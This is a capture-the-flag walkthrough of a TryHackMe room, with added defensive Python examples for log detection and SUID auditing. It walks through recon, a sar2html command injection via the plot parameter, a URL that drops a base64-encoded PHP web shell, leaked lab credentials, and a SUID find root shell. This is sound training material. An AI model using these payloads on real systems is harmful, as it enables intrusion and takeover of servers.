Challenge link: https://tryhackme.com/room/boilerctf2

1. Reconnaissance

First things first, we perform a port scan on the target to discover potential attack vectors:

We catch the SSH service on port 55007 only because we scanned all ports rather than the default range. A full scan takes more time and is quite noisy, but in this CTF setting that is totally fine.

Besides that, we find FTP on port 21, a web server on port 80, and Webmin, a web-based server management control panel, on port 10000.

2. FTP and Webmin

The first thing I do when I see an FTP server is try to log in as Anonymous.

FTP

It works in this case, and listing all files in the directory shows a .info.txt file:

The content of the file looks encrypted, but the typical structure of English text (word lengths, spacing, punctuation) is preserved, which points to a simple substitution cipher:

The Caesar cipher, perhaps? Let’s use CyberChef to try to decrypt the message. The ROT13 recipe reveals the following message:

Just wanted to see if you find it. Lol. Remember: Enumeration is the key!

Well, that is not much use. Let’s move on to the other services then.

Webmin

Since we don’t even have a username to try over SSH and the web server is serving a default page, I decided to look at Webmin. Checking ExploitDB for any CVEs matching Webmin MiniServ 1.930 yields no results, so it is time to go back to the web server.

3. Web server

Not much to see here, so let’s try to find anything interesting by enumerating directories with Gobuster and one of the SecLists wordlists:

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://<URL>/ 

Bingo! Joomla CMS is installed on the server. Besides that, a robots.txt file exists which may contain some clues.

Robots.txt

Let’s look at the robots first:

It looks like another rabbit hole, but perhaps the numbers at the bottom, which look like decimal ASCII codes, mean something:

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

Using CyberChef again with the From Decimal and From Base64 recipes, we discover a string that looks like a hash:

99b0660cd95adea327c54182baa51584

Indeed, CrackStation confirms that this is an MD5 hash. However, the hashed value is ‘kidding’, so this is another rabbit hole.
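As an added example (not from the original write-up), the same robots.txt decoding done in Python instead of CyberChef, followed by a local check of the plaintext the lookup site reported:

```python
import base64
import hashlib
import re

# The decimal values from robots.txt, copied from the write-up above.
ROBOTS_DECIMALS = (
    "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 "
    "090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 "
    "089 109 070 104 078 084 069 049 079 068 081 075"
)

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def from_decimal(text: str) -> str:
    """Same as CyberChef's 'From Decimal': space-separated codes -> text."""
    return "".join(chr(int(code)) for code in text.split())


def from_base64(text: str) -> str:
    """Same as CyberChef's 'From Base64'; strict alphabet, trailing newline trimmed."""
    return base64.b64decode(text, validate=True).decode("ascii").strip()


def decode_robots_blob(text: str) -> str:
    """Peel both layers in order: decimal ASCII first, then Base64."""
    return from_base64(from_decimal(text))


def looks_like_md5(candidate: str) -> bool:
    """32 lowercase hex characters is the shape of an MD5 digest (not proof of one)."""
    return MD5_HEX.match(candidate) is not None


def md5_matches(plaintext: str, digest: str) -> bool:
    """Verify a cracked plaintext locally instead of trusting a lookup site's answer."""
    return hashlib.md5(plaintext.encode()).hexdigest() == digest


if __name__ == "__main__":
    digest = decode_robots_blob(ROBOTS_DECIMALS)
    print("decoded:", digest, "| md5-shaped:", looks_like_md5(digest))
    # The write-up reports that CrackStation resolved this digest to 'kidding'.
    print("md5('kidding') matches:", md5_matches("kidding", digest))
```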

Joomla

The website itself doesn’t reveal anything interesting. Default and simple credentials such as admin:admin do not work. Looking for CVEs against this Joomla doesn’t turn up anything either. Nothing left but to enumerate again with Gobuster.

It took me quite a lot of time to go through the multiple accessible directories, but finally, under the _test/ directory, a sar2html installation is revealed:

Googling for more information reveals that it is most likely vulnerable to RCE. Having read the exploit code, we can execute commands by setting the plot parameter to ;<command>. For example, accessing this URL:

http://<IP>/joomla/_test/?plot=;whoami

prints the username as one of the options in the select HTML element:

This confirms the RCE vulnerability. To make things easier, I echoed a PHP shell into a shell.php file using the following URL (decode the plot parameter to see the executed command):

http://<IP>/joomla/_test/index.php?plot=;echo%20PGh0bWw%2BDQo8Ym9keT4NCjxmb3JtIG1ldGhvZD0iR0VUIiBuYW1lPSI8P3BocCBlY2hvIGJhc2VuYW1lKCRfU0VSVkVSWydQSFBfU0VMRiddKTsgPz4iPg0KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPg0KPGlucHV0IHR5cGU9IlNVQk1JVCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9mb3JtPg0KPHByZT4NCjw%2FcGhwDQogICAgaWYoaXNzZXQoJF9HRVRbJ2NtZCddKSkNCiAgICB7DQogICAgICAgIHN5c3RlbSgkX0dFVFsnY21kJ10pOw0KICAgIH0NCj8%2BDQo8L3ByZT4NCjwvYm9keT4NCjxzY3JpcHQ%2BZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNtZCIpLmZvY3VzKCk7PC9zY3JpcHQ%2BDQo8L2h0bWw%2B%20|%20base64%20-d%20%3E%20shell.php

and started executing commands from there. I connected back to my machine with some help from revshells.com (using their PHP proc_open shell) and listed the files in the directory. This revealed a file called log.txt with this line inside:

Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$ 

Suffice it to say, we get access to the victim through SSH exposed on port 55007.
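From the defender’s side, an added example (not part of the write-up) of spotting the sar2html injection described above in web-server access logs. The log lines are constructed and include the ;whoami probe and the shell.php drop; the query parser splits on ‘&’ only, so a ‘;’ at the start of the plot value is kept rather than treated as a separator.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access log lines. The two /_test/ requests with a ';'
# mirror the ;whoami probe and the base64 'echo ... > shell.php' URL from the write-up.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [20/Aug/2019:11:10:01 +0000] "GET /joomla/_test/index.php?plot=cpu HTTP/1.1" 200 5120
10.0.0.9 - - [20/Aug/2019:11:12:44 +0000] "GET /joomla/_test/?plot=;whoami HTTP/1.1" 200 5133
10.0.0.9 - - [20/Aug/2019:11:14:02 +0000] "GET /joomla/_test/index.php?plot=;echo%20PGh0bWw%2B%20|%20base64%20-d%20%3E%20shell.php HTTP/1.1" 200 5120
10.0.0.9 - - [20/Aug/2019:11:15:30 +0000] "GET /joomla/_test/shell.php?cmd=id HTTP/1.1" 200 812
10.0.0.7 - - [20/Aug/2019:11:16:00 +0000] "GET /joomla/index.php HTTP/1.1" 200 20480
"""

REQUEST_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) ')
# A legitimate sar2html plot name never needs any of these characters.
SHELL_META = re.compile(r"[;|&`$()<>]")


def query_params(query: str) -> dict:
    """Split on '&' only, then percent-decode. Parsers that also split on ';'
    (older urllib.parse.parse_qs did) would turn 'plot=;whoami' into an empty
    plot value and hide exactly the payload we are looking for."""
    params: dict = {}
    for pair in query.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(val))
    return params


def suspicious_plot_requests(log_text: str) -> list:
    """Return (source IP, timestamp, decoded plot value) for every request to the
    sar2html path whose plot parameter contains shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if "/_test/" not in url.path:
            continue
        for value in query_params(url.query).get("plot", []):
            if SHELL_META.search(value):
                hits.append((m["src"], m["ts"], value))
    return hits


if __name__ == "__main__":
    for src, ts, value in suspicious_plot_requests(SAMPLE_ACCESS_LOG):
        print(f"{ts} {src} plot={value!r}")
```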

4. Victim machine

Once logged in to the victim machine as basterd, we find a file called backup.sh in their home directory with the following lines:

USER=stoner
#superduperp@$$no1knows

Looks like we get access to yet another user. Running:

su stoner
superduperp@$$no1knows

switches to the stoner account and reveals a .secret file in their home directory. This is the user flag.

Privilege escalation

This was probably the simplest part of the challenge. Checking for SUID binaries as stoner by running:

find / -perm -u=s -type f 2>/dev/null

reveals that the find utility has this permission set. Confirming with GTFOBins, it can be abused to spawn a privileged shell by running:

find . -exec /bin/sh -p \; -quit

Bingo! The final root flag is located in the /root directory.
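An added example (not from the write-up) of the corresponding defensive check: enumerate setuid files the way the find command above does, then flag any that sit outside a baseline or are known to hand out a shell. The baseline and the shell-capable set are assumptions for this example, not an authoritative list.

```python
import os
import stat

# Example baseline of setuid binaries expected on a Debian-family host (an assumption
# for this example; derive the real one from a known-good image of your own build).
BASELINE_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
                 "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
                 "/usr/bin/umount", "/usr/bin/pkexec"}
# Binaries GTFOBins lists as able to hand out a shell when setuid (subset, assumed
# for the example; check GTFOBins for the full list). find does it via -exec.
SHELL_CAPABLE = {"find", "vim", "env", "bash", "python", "python3", "perl", "awk"}
# Constructed output of: find / -perm -u=s -type f 2>/dev/null
SAMPLE_FIND_OUTPUT = ["/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su",
                      "/usr/bin/find", "/usr/bin/mount", "/usr/bin/umount"]


def scan_suid(root: str = "/") -> list:
    """Live equivalent of the find command: regular files with the setuid bit,
    without following symlinks."""
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def audit_suid(paths, baseline=BASELINE_SUID, shell_capable=SHELL_CAPABLE) -> dict:
    """Sort setuid files into 'baseline' (expected), 'shell-escape' (gives an
    interactive root shell, the case this write-up hits) and 'unexpected' (review)."""
    report = {"baseline": [], "shell-escape": [], "unexpected": []}
    for path in paths:
        if path in baseline:
            report["baseline"].append(path)
        elif os.path.basename(path) in shell_capable:
            report["shell-escape"].append(path)
        else:
            report["unexpected"].append(path)
    return report


def remediation(path: str) -> str:
    """The fix for a binary like /usr/bin/find that never needs setuid."""
    return f"chmod u-s {path}"


if __name__ == "__main__":
    print(audit_suid(SAMPLE_FIND_OUTPUT))
```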